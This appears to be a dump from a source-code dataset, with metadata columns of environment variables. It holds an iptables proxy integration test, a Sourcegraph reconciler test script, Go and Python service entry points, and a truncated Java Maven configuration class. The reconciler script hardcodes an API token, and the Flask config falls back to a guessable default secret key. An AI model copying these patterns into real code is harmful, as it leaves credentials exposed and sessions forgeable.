all_gpus = {}
if arg == 'ALL':
return set(all_gpus.values())
else:
gpuset = arg.split(',')
if not all(gpu in all_gpus or gpu in all_gpus.values() for gpu in gpuset):
raise argparse.ArgumentTypeError("GPUSET_STR invalid: GPUs out of range")
return set(all_gpus.get(gpu, gpu) for gpu in gpuset)
if __name__ == '__main__':
main()
| []
| []
| [
"CODALAB_USERNAME",
"CODALAB_PASSWORD"
]
| [] | ["CODALAB_USERNAME", "CODALAB_PASSWORD"] | python | 2 | 0 | |
proxy-init/integration_test/iptables/http_test.go | package iptablestest
import (
"testing"
"net/http"
"io/ioutil"
"fmt"
"os"
"strings"
"net/url"
)
const (
ignoredContainerPort = "7070"
proxyContainerPort = "8080"
notTheProxyContainerPort = "9090"
)
func TestPodWithNoRules(t *testing.T) {
podWithNoRulesIp := os.Getenv("POD_WITH_NO_RULES_IP")
svcName := "svc-pod-with-no-rules"
t.Run("succeeds connecting to pod directly through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podWithNoRulesIp, proxyContainerPort)
})
t.Run("fails to connect to pod directly through any port that isn't the container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectCannotConnectGetRequestTo(t, podWithNoRulesIp, "8088")
expectCannotConnectGetRequestTo(t, podWithNoRulesIp, "8888")
expectCannotConnectGetRequestTo(t, podWithNoRulesIp, "8988")
})
t.Run("succeeds connecting to pod via a service through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, svcName, proxyContainerPort)
})
t.Run("fails to connect to pod via a service through any port that isn't the container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectCannotConnectGetRequestTo(t, svcName, "8088")
expectCannotConnectGetRequestTo(t, svcName, "8888")
expectCannotConnectGetRequestTo(t, svcName, "8988")
})
}
func TestPodRedirectsAllPorts(t *testing.T) {
podRedirectsAllPortsIp := os.Getenv("POD_REDIRECTS_ALL_PORTS_IP")
svcName := "svc-pod-redirects-all-ports"
t.Run("succeeds connecting to pod directly through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podRedirectsAllPortsIp, proxyContainerPort)
})
t.Run("succeeds connecting to pod directly through any port that isn't the container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podRedirectsAllPortsIp, "8088")
expectSuccessfulGetRequestTo(t, podRedirectsAllPortsIp, "8888")
expectSuccessfulGetRequestTo(t, podRedirectsAllPortsIp, "8988")
})
t.Run("succeeds connecting to pod via a service through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, svcName, proxyContainerPort)
})
t.Run("fails to connect to pod via a service through any port that isn't the container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectCannotConnectGetRequestTo(t, svcName, "8088")
expectCannotConnectGetRequestTo(t, svcName, "8888")
expectCannotConnectGetRequestTo(t, svcName, "8988")
})
}
func TestPodWithSomePortsRedirected(t *testing.T) {
podRedirectsSomePortsIp := os.Getenv("POD_REDIRECTS_WHITELISTED_IP")
t.Run("succeeds connecting to pod directly through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podRedirectsSomePortsIp, proxyContainerPort)
})
t.Run("succeeds connecting to pod directly through ports configured to redirect", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podRedirectsSomePortsIp, "9090")
expectSuccessfulGetRequestTo(t, podRedirectsSomePortsIp, "9099")
})
	t.Run("fails to connect to pod directly through any port that isn't configured to redirect", func(t *testing.T) {
marksParallelIfConfigured(t)
expectCannotConnectGetRequestTo(t, podRedirectsSomePortsIp, "8088")
expectCannotConnectGetRequestTo(t, podRedirectsSomePortsIp, "8888")
expectCannotConnectGetRequestTo(t, podRedirectsSomePortsIp, "8988")
})
}
func TestPodWithSomePortsIgnored(t *testing.T) {
podIgnoredSomePortsIp := os.Getenv("POD_DOEST_REDIRECT_BLACKLISTED_IP")
t.Run("succeeds connecting to pod directly through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podIgnoredSomePortsIp, proxyContainerPort)
})
t.Run("succeeds connecting to pod directly through ports configured to redirect", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podIgnoredSomePortsIp, "9090")
expectSuccessfulGetRequestTo(t, podIgnoredSomePortsIp, "9099")
})
	t.Run("doesn't redirect when connecting through a port that is ignored", func(t *testing.T) {
marksParallelIfConfigured(t)
response := expectSuccessfulGetRequestTo(t, podIgnoredSomePortsIp, ignoredContainerPort)
if !strings.Contains(response, ignoredContainerPort) {
t.Fatalf("Expected iptables to ignore connection to %s, got back %s", ignoredContainerPort, response)
}
})
}
func TestPodMakesOutboundConnection(t *testing.T) {
podIgnoredSomePortsIp := os.Getenv("POD_DOEST_REDIRECT_BLACKLISTED_IP")
podWithNoRulesIp := os.Getenv("POD_WITH_NO_RULES_IP")
podWithNoRulesName := "pod-with-no-rules"
proxyPodName := "pod-doesnt-redirect-blacklisted"
proxyPodIp := podIgnoredSomePortsIp
t.Run("connecting to another pod from non-proxy container gets redirected to proxy", func(t *testing.T) {
marksParallelIfConfigured(t)
		portOfContainerToMakeTheRequest := ignoredContainerPort
		targetPodIp := podWithNoRulesIp
		targetPort := ignoredContainerPort
		response := makeCallFromContainerToAnother(t, proxyPodIp, portOfContainerToMakeTheRequest, targetPodIp, targetPort)
		expectedDownstreamResponse := fmt.Sprintf("me:[%s:%s]downstream:[proxy]", proxyPodName, portOfContainerToMakeTheRequest)
if !strings.Contains(response, expectedDownstreamResponse) {
t.Fatalf("Expected response to be redirected to the proxy, expected %s but it was %s", expectedDownstreamResponse, response)
}
})
t.Run("connecting to another pod from proxy container does not get redirected to proxy", func(t *testing.T) {
marksParallelIfConfigured(t)
targetPodIp := podWithNoRulesIp
targetPodName := podWithNoRulesName
response := makeCallFromContainerToAnother(t, proxyPodIp, proxyContainerPort, targetPodIp, notTheProxyContainerPort)
expectedDownstreamResponse := fmt.Sprintf("me:[proxy]downstream:[%s:%s]", targetPodName, notTheProxyContainerPort)
if !strings.Contains(response, expectedDownstreamResponse) {
t.Fatalf("Expected response not to be redirected to the proxy, expected %s but it was %s", expectedDownstreamResponse, response)
}
})
t.Run("connecting to loopback from non-proxy container does not get redirected to proxy", func(t *testing.T) {
marksParallelIfConfigured(t)
response := makeCallFromContainerToAnother(t, proxyPodIp, ignoredContainerPort, "127.0.0.1", notTheProxyContainerPort)
expectedDownstreamResponse := fmt.Sprintf("me:[%s:%s]downstream:[%s:%s]", proxyPodName, ignoredContainerPort, proxyPodName, notTheProxyContainerPort)
if !strings.Contains(response, expectedDownstreamResponse) {
t.Fatalf("Expected response not to be redirected to the proxy, expected %s but it was %s", expectedDownstreamResponse, response)
}
})
}
func makeCallFromContainerToAnother(t *testing.T, fromPodNamed string, fromContainerAtPort string, podIWantToReachName string, containerPortIWantToReach string) string {
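	// For example (illustrative IPs), makeCallFromContainerToAnother(t, "10.0.0.5", "7070", "10.0.0.9", "9090")
	// issues GET http://10.0.0.5:7070/call?url=http%3A%2F%2F10.0.0.9%3A9090, asking the first container
	// to perform the downstream request itself.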
downstreamUrl := fmt.Sprintf("http://%s:%s", podIWantToReachName, containerPortIWantToReach)
//Make request asking target to make a back-end request
targetUrl := fmt.Sprintf("http://%s:%s/call?url=%s", fromPodNamed, fromContainerAtPort, url.QueryEscape(downstreamUrl))
return expectSuccessfulGetRequestToUrl(t, targetUrl)
}
func marksParallelIfConfigured(t *testing.T) {
t.Parallel()
}
func expectCannotConnectGetRequestTo(t *testing.T, host string, port string) {
targetUrl := fmt.Sprintf("http://%s:%s/", host, port)
fmt.Printf("Expecting failed GET to %s\n", targetUrl)
resp, err := http.Get(targetUrl)
if err == nil {
t.Fatalf("Expected error when connecting to %s, got:\n%s", targetUrl, resp)
}
}
func expectSuccessfulGetRequestTo(t *testing.T, host string, port string) string {
targetUrl := fmt.Sprintf("http://%s:%s/", host, port)
return expectSuccessfulGetRequestToUrl(t, targetUrl)
}
func expectSuccessfulGetRequestToUrl(t *testing.T, url string) string {
fmt.Printf("Expecting successful GET to %s\n", url)
resp, err := http.Get(url)
if err != nil {
t.Fatalf("failed to send HTTP GET to %s:\n%v", url, err)
}
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
t.Fatalf("failed reading GET response from %s:\n%v", url, err)
}
response := string(body)
fmt.Printf("Response from %s: %s", url, response)
return response
}
| [
"\"POD_WITH_NO_RULES_IP\"",
"\"POD_REDIRECTS_ALL_PORTS_IP\"",
"\"POD_REDIRECTS_WHITELISTED_IP\"",
"\"POD_DOEST_REDIRECT_BLACKLISTED_IP\"",
"\"POD_DOEST_REDIRECT_BLACKLISTED_IP\"",
"\"POD_WITH_NO_RULES_IP\""
]
| []
| [
"POD_REDIRECTS_WHITELISTED_IP",
"POD_DOEST_REDIRECT_BLACKLISTED_IP",
"POD_WITH_NO_RULES_IP",
"POD_REDIRECTS_ALL_PORTS_IP"
]
| [] | ["POD_REDIRECTS_WHITELISTED_IP", "POD_DOEST_REDIRECT_BLACKLISTED_IP", "POD_WITH_NO_RULES_IP", "POD_REDIRECTS_ALL_PORTS_IP"] | go | 4 | 0 | |
dev/reconciler-test-script/main.go | package main
import (
"bytes"
"context"
"database/sql"
"encoding/json"
"flag"
"fmt"
"log"
"net/http"
"os"
"strings"
"github.com/keegancsmith/sqlf"
"github.com/sourcegraph/sourcegraph/cmd/frontend/graphqlbackend"
"github.com/sourcegraph/sourcegraph/internal/api"
"github.com/sourcegraph/sourcegraph/internal/db/basestore"
"github.com/sourcegraph/sourcegraph/internal/db/dbutil"
)
// This is a test script that I use to manually integration-test the new
// changeset reconciler.
//
// It's pretty self-explanatory, I guess, and I want to keep it around for a bit.
const (
// It's local access token, don't worry.
authHeader = "token 1b13a0a1217377aa9a43d7cc46782f24b648ab0c"
graphqlEndpoint = "http://localhost:3082/.api/graphql" // CI:LOCALHOST_OK
)
var deleteFlag = flag.Bool("del", false, "delete everything campaign-related in the DB before applying new campaign specs")
func main() {
flag.Parse()
if *deleteFlag {
deleteEverything()
}
automationTestingID := getRepositoryID("github.com/sourcegraph/automation-testing")
err := applySpecs(applyOpts{
namespace: "VXNlcjoxCg==", // User:1
campaignSpec: newCampaignSpec("thorstens-campaign", "Updated description of my campaign"),
changesetSpecs: []string{
// `{"baseRepository":"` + automationTestingID + `","externalID":"1"}`,
// `{"baseRepository":"` + automationTestingID + `","externalID":"311"}`,
// `{"baseRepository":"` + automationTestingID + `","externalID":"309"}`,
`{
"baseRepository": "` + automationTestingID + `",
"baseRev": "e4435274b43033cf0c212f61a2c16f7f2210cf56",
"baseRef":"refs/heads/master",
"headRepository": "` + automationTestingID + `",
"headRef":"refs/heads/retrying-changeset-creation",
"title": "The reconciler created this PR",
"body": "The reconciler also created this PR body",
"published": true,
"commits": [{
"message": "Pretty cool new commit message",
"diff":` + fmt.Sprintf("%q", automationTestingDiff) + `}]
}`,
},
})
if err != nil {
log.Fatalf("failed to apply specs: %s", err)
}
err = applySpecs(applyOpts{
namespace: "VXNlcjoxCg==",
campaignSpec: newCampaignSpec("thorstens-2nd-campaign", "This is the second campaign"),
changesetSpecs: []string{
// `{"baseRepository":"` + automationTestingID + `","externalID":"311"}`,
// `{"baseRepository":"` + automationTestingID + `","externalID":"309"}`,
`{
"baseRepository": "` + automationTestingID + `",
"baseRev": "e4435274b43033cf0c212f61a2c16f7f2210cf56",
"baseRef":"refs/heads/master",
"headRepository": "` + automationTestingID + `",
"headRef":"refs/heads/thorstens-2nd-campaign",
"title": "PR in second campaign",
"body": "PR body in second campaign",
"published": true,
"commits": [{
"message": "Pretty commit message",
"diff":` + fmt.Sprintf("%q", automationTestingDiff2) + `}]
}`,
},
})
if err != nil {
log.Fatalf("failed to apply specs: %s", err)
}
}
type applyOpts struct {
namespace string
changesetSpecs []string
campaignSpec string
}
func applySpecs(opts applyOpts) error {
var changesetSpecIDs []string
for i, spec := range opts.changesetSpecs {
fmt.Printf("Creating changesetSpec %d... ", i)
q := fmt.Sprintf(createChangesetSpecTmpl, spec)
res, err := sendRequest(q)
if err != nil {
return err
}
id := res.Data.CreateChangesetSpec.ID
changesetSpecIDs = append(changesetSpecIDs, id)
fmt.Printf("Done. ID: %s\n", id)
}
fmt.Printf("Creating campaignSpec... ")
q := fmt.Sprintf(createCampaignSpecTmpl,
opts.namespace,
opts.campaignSpec,
graphqlIDList(changesetSpecIDs...),
)
res, err := sendRequest(q)
if err != nil {
		return fmt.Errorf("failed to create campaign spec: %s", err)
}
campaignSpecID := res.Data.CreateCampaignSpec.ID
fmt.Printf("Done. ID: %s\n", campaignSpecID)
fmt.Printf("Applying campaignSpec... ")
q = fmt.Sprintf(applyCampaignTmpl, campaignSpecID)
res, err = sendRequest(q)
if err != nil {
		return fmt.Errorf("failed to apply campaign: %s", err)
}
campaignID := res.Data.ApplyCampaign.ID
fmt.Printf("Done. Campaign ID: %s\n", campaignID)
return nil
}
const applyCampaignTmpl = `
mutation ApplyCampaign { applyCampaign(campaignSpec: %q) { id } }
`
const createChangesetSpecTmpl = `
mutation CreateChangesetSpec {
createChangesetSpec(changesetSpec: %q) {
... on HiddenChangesetSpec { id }
... on VisibleChangesetSpec { id }
}
}
`
const createCampaignSpecTmpl = `
mutation CreateCampaignSpec {
createCampaignSpec(namespace: %q, campaignSpec: %q, changesetSpecs: %s) {
id
}
}
`
type graphqlPayload struct {
Query string
}
func graphqlIDList(ids ...string) string {
var quoted []string
for _, id := range ids {
quoted = append(quoted, fmt.Sprintf("%q", id))
}
return fmt.Sprintf("[%s]", strings.Join(quoted, ", "))
}
type graphqlResponse struct {
Data struct {
CreateChangesetSpec struct {
ID string
}
CreateCampaignSpec struct {
ID string
}
ApplyCampaign struct {
ID string
}
}
Errors []struct {
Message string
}
}
func sendRequest(query string) (graphqlResponse, error) {
var res graphqlResponse
b := new(bytes.Buffer)
json.NewEncoder(b).Encode(graphqlPayload{Query: query})
req, err := http.NewRequest("POST", graphqlEndpoint, b)
if err != nil {
return res, err
}
req.Header.Add("Authorization", authHeader)
resp, err := http.DefaultClient.Do(req)
if err != nil {
return res, err
}
if err := json.NewDecoder(resp.Body).Decode(&res); err != nil {
return res, err
}
if len(res.Errors) != 0 {
var messages []string
for _, e := range res.Errors {
messages = append(messages, e.Message)
}
list := strings.Join(messages, "\n- ")
return res, fmt.Errorf("graphql errors:\n\t- %s\n", list)
}
return res, nil
}
func newCampaignSpec(name, description string) string {
return fmt.Sprintf(`{
"name": %q,
"description": %q,
"on": [
{"repositoriesMatchingQuery": "lang:go func main"},
{"repository": "github.com/sourcegraph/src-cli"}
],
"steps": [
{
"run": "echo 'foobar'",
"container": "alpine",
"env": {
"PATH": "/work/foobar:$PATH"
}
}
],
"changesetTemplate": {
"title": "Hello World",
"body": "My first campaign!",
"branch": "hello-world",
"commit": {
"message": "Append Hello World to all README.md files"
},
"published": false
}
}`, name, description)
}
const automationTestingDiff = `diff --git test.md test.md
index 52ada66..0aaaf37 100644
--- test.md
+++ test.md
@@ -1 +1,3 @@
-# This is a test
+# This is a test.
+
+And this is another line
`
const automationTestingDiff2 = `diff --git test.md test.md
index 52ada66..0aaaf37 100644
--- test.md
+++ test.md
@@ -1 +1,3 @@
-# This is a test
+# What an amazing test!
+
+And this is another line
`
func deleteEverything() {
ctx := context.Background()
dsn := dbutil.PostgresDSN("sourcegraph", os.Getenv)
db, err := dbutil.NewDB(dsn, "campaigns-reconciler")
if err != nil {
log.Fatalf("failed to initialize db store: %v", err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM changeset_events;"); err != nil {
log.Fatal(err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM changesets;"); err != nil {
log.Fatal(err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM campaigns;"); err != nil {
log.Fatal(err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM changeset_specs;"); err != nil {
log.Fatal(err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM campaign_specs;"); err != nil {
log.Fatal(err)
}
}
func getRepositoryID(name string) string {
dsn := dbutil.PostgresDSN("sourcegraph", os.Getenv)
s, err := basestore.New(dsn, "campaigns-reconciler", sql.TxOptions{})
if err != nil {
log.Fatalf("failed to initialize db store: %v", err)
}
q := sqlf.Sprintf("select id from repo where name = %q", name)
id, ok, err := basestore.ScanFirstInt(s.Query(context.Background(), q))
if err != nil || !ok {
log.Fatalf("querying repository id: %s", err)
}
return string(graphqlbackend.MarshalRepositoryID(api.RepoID(id)))
}
//
// ____ __ ______________ _________ ____ ______
// / __ \/ / / / ____/_ __/ /_ __/ | / __ \/ ____/
// / / / / / / / / / / / / / /| | / /_/ / __/
// / /_/ / /_/ / /___ / / / / / ___ |/ ____/ /___
// /_____/\____/\____/ /_/ /_/ /_/ |_/_/ /_____/
//
//
//
//
//
//
// .,/(##%##(((##
// ,#((#(((((((((((((((((((((((((((((((((((#
// (/////(((((//(((((((((((((////////////////////.
// (///////(((/(//////////////////*//***/***********/
// /**//*///(/((///(/*****************,,**,,**,**,**,,*/
// ********/*///(//////*.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*
// ***********///(////**** ................................,
// .*,**********//////****** .......... ....................,
// *,,,,*****/*,*/////******* . .....................*
// ,,,,,,*,/.....,(#/******,,, .. . .....................,.,.,,
// ,,,,,,,(....,,,,,,,***,*,,,, ................,..,,,,,,,,,,,,*
// ,,,,,,,..&*%.(%&@.,,,***,,** ...........,,,,,,,,,,,,,,,******/
// .,,,,,/..,%,.,/.(,,,,,**,****.,,,,,,,,,,,,,*,****************/
// ..,,,.*. .... *#(,**,,******,*********************///////////(
// ..,,.,* .#.#.,,,,*,**/,******,,*******////////////////////////(
// ,...,,* *#& /,,,,,***.,****,**////////////////////////////////
// ,..,,., /* % #.,,,&,***,**,,,**////////////////////////////////
// ..,..., .,@....,,,,***,,,,,*,,//////////////////////////////*/.
// ......,, .#...,&,**,,,,***,///////////////*****************.
// ......* * %...,,,,,,,,,,,,********************************
// ,......, # &....,.,,,,,,,,************************////////
// ....,,,* / .. ...,,,,,,,,,***/////////////////////////////
// ,.,,,.,,,, ( ...,,,,,,,,,/**//////////////////////////////
// *,,,,,,,,,,,,,,,,,,,,,,,,,/,*******////////////////////////,
// *,,,,,,,,,,,,,*,,,,,,,*,./#********/*/*////////////////////
// ,,,,,,,,,,,,,*,*,*,,,,,/((,***************/**/**/**/******
// ,,,,,,,,,,,,***,**,,*(((#*********************////////**/
// *,,,,,,,,,,,,,**,**(((((.***********/*******************
// .,,,,,,,,,,**,./((((###********************************
// *,,,,,,*,,((###%&@&/********************************.
// ............********************************
// ............/******************************,*
// ...........******************************,,
// .........****,***,*******,,,,,,,,,,,,,,,,,
// .......*,,,,,*,,,,,,.,,,,,,,,,,,.,,,,,**/
// .....,,,..............,,,,***////////////(.
// ... .....,,,***//*/***********//////*
// /*//****************//,
// ./****//,
| []
| []
| []
| [] | [] | go | 0 | 0 | |
cmd/main.go | package main
import (
"context"
"errors"
"fmt"
"os"
"os/signal"
"strings"
"sync/atomic"
"time"
"github.com/rs/zerolog"
"github.com/nitro/lazyraster/v2/internal"
)
func main() {
var (
logger = zerolog.New(os.Stdout).With().Timestamp().Caller().Logger()
cacheBucket = os.Getenv("CACHE_BUCKET")
cacheSecret = os.Getenv("CACHE_SECRET")
urlSigningSecret = os.Getenv("URL_SIGNING_SECRET")
enableDatadog = os.Getenv("ENABLE_DATADOG")
rawStorageBucketRegion = os.Getenv("STORAGE_BUCKET_REGION")
)
if cacheBucket == "" {
logger.Fatal().Msg("Environment variable 'CACHE_BUCKET' can't be empty")
}
if cacheSecret == "" {
logger.Fatal().Msg("Environment variable 'CACHE_SECRET' can't be empty")
}
if urlSigningSecret == "" {
logger.Fatal().Msg("Environment variable 'URL_SIGNING_SECRET' can't be empty")
}
if rawStorageBucketRegion == "" {
logger.Fatal().Msg("Environment variable 'STORAGE_BUCKET_REGION' can't be empty")
}
storageBucketRegion, err := parseStorageBucketRegion(rawStorageBucketRegion)
if err != nil {
logger.Fatal().Msg("Fail to parse the environment variable 'STORAGE_BUCKET_REGION' payload")
}
waitHandlerAsyncError, waitHandler := wait(logger)
client := internal.Client{
Logger: logger,
AsyncErrorHandler: waitHandlerAsyncError,
CacheBucket: cacheBucket,
CacheSecret: cacheSecret,
URLSigningSecret: urlSigningSecret,
EnableDatadog: enableDatadog == "true",
StorageBucketRegion: storageBucketRegion,
}
if err := client.Init(); err != nil {
logger.Fatal().Err(err).Msg("Fail to initialize the client")
}
client.Start()
exitStatus := waitHandler()
ctx, ctxCancel := context.WithTimeout(context.Background(), 10*time.Second)
if err := client.Stop(ctx); err != nil {
ctxCancel()
logger.Fatal().Err(err).Msg("Fail to stop the client")
}
ctxCancel()
os.Exit(exitStatus)
}
func wait(logger zerolog.Logger) (func(error), func() int) {
signalChan := make(chan os.Signal, 2)
var exitStatus int32
asyncError := func(err error) {
logger.Error().Err(err).Msg("Async error happened")
signalChan <- os.Interrupt
atomic.AddInt32(&exitStatus, 1)
}
handler := func() int {
signal.Notify(signalChan, os.Interrupt)
<-signalChan
return (int)(exitStatus)
}
return asyncError, handler
}
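// parseStorageBucketRegion turns the STORAGE_BUCKET_REGION payload into a bucket-to-region map.
// The expected format, inferred from the parsing below, is "region:bucket,bucket;region:bucket",
// e.g. "us-east-1:bucket-a,bucket-b;eu-west-1:bucket-c" (illustrative names), which yields
// {"bucket-a": "us-east-1", "bucket-b": "us-east-1", "bucket-c": "eu-west-1"}.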
func parseStorageBucketRegion(payload string) (map[string]string, error) {
result := make(map[string]string)
for _, segment := range strings.Split(payload, ";") {
fragments := strings.Split(segment, ":")
if len(fragments) != 2 {
return nil, errors.New("invalid payload")
}
region := strings.TrimSpace(fragments[0])
buckets := strings.Split(fragments[1], ",")
if len(buckets) == 0 {
return nil, errors.New("expected at least one bucket")
}
for _, bucket := range buckets {
result[strings.TrimSpace(bucket)] = region
}
}
if len(result) == 0 {
return nil, fmt.Errorf("fail to parse the storage bucket region")
}
return result, nil
}
| [
"\"CACHE_BUCKET\"",
"\"CACHE_SECRET\"",
"\"URL_SIGNING_SECRET\"",
"\"ENABLE_DATADOG\"",
"\"STORAGE_BUCKET_REGION\""
]
| []
| [
"URL_SIGNING_SECRET",
"CACHE_BUCKET",
"CACHE_SECRET",
"STORAGE_BUCKET_REGION",
"ENABLE_DATADOG"
]
| [] | ["URL_SIGNING_SECRET", "CACHE_BUCKET", "CACHE_SECRET", "STORAGE_BUCKET_REGION", "ENABLE_DATADOG"] | go | 5 | 0 | |
tests/conftest.py | import pytest
@pytest.fixture()
def loop(event_loop):
""" Shortcut """
return event_loop
| []
| []
| []
| [] | [] | python | null | null | null |
apiview_1/wsgi.py | """
WSGI config for apiview_1 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'apiview_1.settings')
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
strava_analysis/analyze_data/analyze_data.py | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime as date
import os
import sys
import utils.analyze_data_utils as analyze_data_utils
import utils.general_utils as general_utils
# import strava_analysis.utils.analyze_data_utils as analyze_data_utils
# import strava_analysis.utils.general_utils as general_utils
def run():
# investigates relationship between speed and distance
analyze_data_utils.speed_vs_distance(os.environ['combined_activities'])
# investigates max speed over time
analyze_data_utils.max_speed_over_time(os.environ['combined_activities'])
# investigates avg speed over time
analyze_data_utils.avg_speed_over_time(os.environ['combined_activities'])
# compares two time frames data
analyze_data_utils.compare_time_frames(os.environ['combined_activities'],
start_1 = '2019-07-01',
end_1 = '2020-04-01',
start_2 = '2020-10-03',
end_2 = '2021-04-26')
# investigating kudo
analyze_data_utils.kudo_analysis(os.environ['new_activities_clean'])
| []
| []
| [
"combined_activities",
"new_activities_clean"
]
| [] | ["combined_activities", "new_activities_clean"] | python | 2 | 0 | |
config.py | import os
from dotenv import load_dotenv
basedir = os.path.abspath(os.path.dirname(__file__))
load_dotenv()
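# The values below come from the environment, typically via the .env file loaded above.
# Illustrative .env entries (assumed, not shipped with the repo):
#   SECRET_KEY=change-me
#   DATABASE_URL=sqlite:///app.db
#   MAIL_SERVER=localhost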
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guess'
# SQL
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or 'sqlite:///' + os.path.join(basedir, 'app.db')
SQLALCHEMY_TRACK_MODIFICATIONS = False
# Email
MAIL_SERVER = os.environ.get('MAIL_SERVER')
MAIL_PORT = int(os.environ.get('MAIL_PORT') or 25)
MAIL_USE_TLS = os.environ.get('MAIL_USE_TLS') is not None
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
ADMINS = ['[email protected]']
# Pagination
POSTS_PER_PAGE = 3
# Localisation
LANGUAGES = ['en', 'es', 'fr']
AZURE_TRANSLATOR_KEY = os.getenv('AZURE_TRANSLATOR_KEY')
AZURE_TRANSLATOR_LOCATION = 'global'
TRANSLATION_ENDPOINT = "https://api.cognitive.microsofttranslator.com"
# Elasticsearch
ELASTICSEARCH_URL = os.environ.get('ELASTICSEARCH_URL') | []
| []
| [
"MAIL_SERVER",
"MAIL_PASSWORD",
"DATABASE_URL",
"MAIL_PORT",
"SECRET_KEY",
"MAIL_USERNAME",
"MAIL_USE_TLS",
"AZURE_TRANSLATOR_KEY",
"ELASTICSEARCH_URL"
]
| [] | ["MAIL_SERVER", "MAIL_PASSWORD", "DATABASE_URL", "MAIL_PORT", "SECRET_KEY", "MAIL_USERNAME", "MAIL_USE_TLS", "AZURE_TRANSLATOR_KEY", "ELASTICSEARCH_URL"] | python | 9 | 0 | |
fabric/fabric-maven/src/main/java/io/fabric8/maven/util/MavenConfigurationImpl.java | /*
* Copyright 2007 Alin Dreghiciu.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied.
*
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.fabric8.maven.util;
import java.io.File;
import java.net.Authenticator;
import java.net.MalformedURLException;
import java.net.PasswordAuthentication;
import java.net.URL;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.HashMap;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import io.fabric8.common.util.NullArgumentException;
import io.fabric8.maven.url.ServiceConstants;
import org.apache.maven.settings.Profile;
import org.apache.maven.settings.Repository;
import org.apache.maven.settings.Settings;
import org.apache.maven.settings.building.DefaultSettingsBuilder;
import org.apache.maven.settings.building.DefaultSettingsBuilderFactory;
import org.apache.maven.settings.building.DefaultSettingsBuildingRequest;
import org.apache.maven.settings.building.SettingsBuildingException;
import org.apache.maven.settings.building.SettingsBuildingRequest;
import org.apache.maven.settings.building.SettingsBuildingResult;
import org.ops4j.util.property.PropertyResolver;
import org.ops4j.util.property.PropertyStore;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* Service Configuration implementation.
*
* @author Alin Dreghiciu
* @see MavenConfiguration
* @since August 11, 2007
*/
public class MavenConfigurationImpl extends PropertyStore implements MavenConfiguration {
/**
* Logger.
*/
private static final Logger LOGGER = LoggerFactory.getLogger(MavenConfigurationImpl.class);
/**
     * The character that, when used as the first character of the repositories property, causes
     * the repositories from settings.xml to be appended as well.
*/
private final static String REPOSITORIES_APPEND_SIGN = "+";
/**
* Repositories separator.
*/
private final static String REPOSITORIES_SEPARATOR = ",";
/**
* Use a default timeout of 5 seconds.
*/
private final static String DEFAULT_TIMEOUT = "5000";
/**
* Configuration PID. Cannot be null or empty.
*/
private final String m_pid;
/**
* Property resolver. Cannot be null.
*/
private final PropertyResolver m_propertyResolver;
private Settings settings;
/**
* Creates a new service configuration.
*
* @param propertyResolver
* propertyResolver used to resolve properties; mandatory
* @param pid
* configuration PID; mandatory
*/
public MavenConfigurationImpl(final PropertyResolver propertyResolver, final String pid) {
NullArgumentException.validateNotNull(propertyResolver, "Property resolver");
m_pid = pid == null ? "" : pid + ".";
m_propertyResolver = propertyResolver;
settings = buildSettings(getLocalRepoPath(propertyResolver), getSettingsPath(),
useFallbackRepositories());
}
@Override
public PropertyResolver getPropertyResolver() {
return m_propertyResolver;
}
public boolean isValid() {
return m_propertyResolver.get(m_pid + ServiceConstants.REQUIRE_CONFIG_ADMIN_CONFIG) == null;
}
/**
* @see MavenConfiguration#isOffline()
*/
public boolean isOffline() {
if (!contains(m_pid + ServiceConstants.PROPERTY_OFFLINE)) {
return set(
m_pid + ServiceConstants.PROPERTY_OFFLINE,
Boolean.valueOf(m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_OFFLINE)));
}
return get(m_pid + ServiceConstants.PROPERTY_OFFLINE);
}
/**
* @see MavenConfiguration#getCertificateCheck()
*/
public boolean getCertificateCheck() {
if (!contains(m_pid + ServiceConstants.PROPERTY_CERTIFICATE_CHECK)) {
return set(
m_pid + ServiceConstants.PROPERTY_CERTIFICATE_CHECK,
